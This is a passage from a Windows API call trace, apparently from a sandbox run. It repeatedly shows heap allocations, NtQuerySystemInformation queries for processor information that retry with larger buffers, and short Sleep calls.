Size=0x30) returned 0x295d718 [0288.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0288.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0288.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0288.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0288.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0288.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0288.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0288.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.143] Sleep (dwMilliseconds=0x110) [0288.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0288.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0288.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0288.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0288.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0288.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0288.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0288.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0288.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.164] Sleep (dwMilliseconds=0x110) [0288.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0288.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0288.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0288.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0288.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0288.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0288.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0288.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0288.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.173] Sleep (dwMilliseconds=0x110) [0288.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0288.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0288.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0288.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0288.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0288.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0288.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0288.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0288.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.191] Sleep (dwMilliseconds=0x110) [0288.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0288.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0288.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0288.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0288.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0288.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0288.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0288.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0288.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.207] Sleep (dwMilliseconds=0x110) [0288.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0288.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0288.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0288.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0288.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0288.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0288.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0288.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0288.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.222] Sleep (dwMilliseconds=0x110) [0288.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0288.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0288.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0288.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0288.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0288.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0288.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0288.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0288.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.238] Sleep (dwMilliseconds=0x110) [0288.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0288.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0288.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0288.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0288.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0288.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0288.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0288.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0288.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.254] Sleep (dwMilliseconds=0x110) [0288.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0288.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0288.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0288.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0288.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0288.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0288.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0288.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0288.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.270] Sleep (dwMilliseconds=0x110) [0288.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0288.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0288.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0288.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0288.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0288.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0288.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0288.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0288.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.286] Sleep (dwMilliseconds=0x110) [0288.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0288.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0288.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0288.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0288.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0288.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0288.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0288.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0288.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.302] Sleep (dwMilliseconds=0x110) [0288.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0288.366] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0288.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0288.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0288.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0288.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0288.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0288.368] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.371] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0288.371] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.372] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.373] Sleep (dwMilliseconds=0x110) [0288.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0288.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0288.789] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0288.789] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.790] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0288.790] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0288.790] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.791] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0288.791] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0288.791] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.791] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0288.791] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.792] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.792] Sleep (dwMilliseconds=0x110) [0288.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0288.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0288.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0288.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0288.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0288.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0288.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0288.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0288.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: 